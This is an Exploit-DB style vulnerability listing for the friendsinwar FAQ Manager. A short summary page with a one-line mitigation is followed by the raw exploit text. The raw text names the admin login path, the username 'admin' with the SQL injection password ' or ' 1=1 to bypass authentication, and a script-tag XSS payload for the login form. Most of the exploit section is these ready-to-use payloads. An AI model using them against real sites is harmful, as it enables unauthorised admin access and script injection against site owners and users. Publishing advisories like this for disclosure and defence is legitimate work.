friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability

vendor:

FAQ Manager

by:

d3b4g

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: FAQ Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability

A SQL Injection vulnerability exists in the friendsinwar FAQ Manager software. An attacker can bypass the authentication process by using the username 'admin' and the password ' or ' 1=1. Additionally, a Cross Site Scripting vulnerability exists in the login form, allowing an attacker to insert malicious JavaScript code.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me


 
  
----------------------------------------------------------------------------------
     () SQL Injection :


     http://localhost/path/the_faq_manager/admin/login.php

     + Use following information to bypass login.

 
      User:admin
     
      ' or ' 1=1


      () Cross Site Scripting:

       XSS in loging form, insert follwing JS code to loging follwing. 

     '"()&%1<ScRiPt >prompt(952226)</ScRiPt>

 





-end-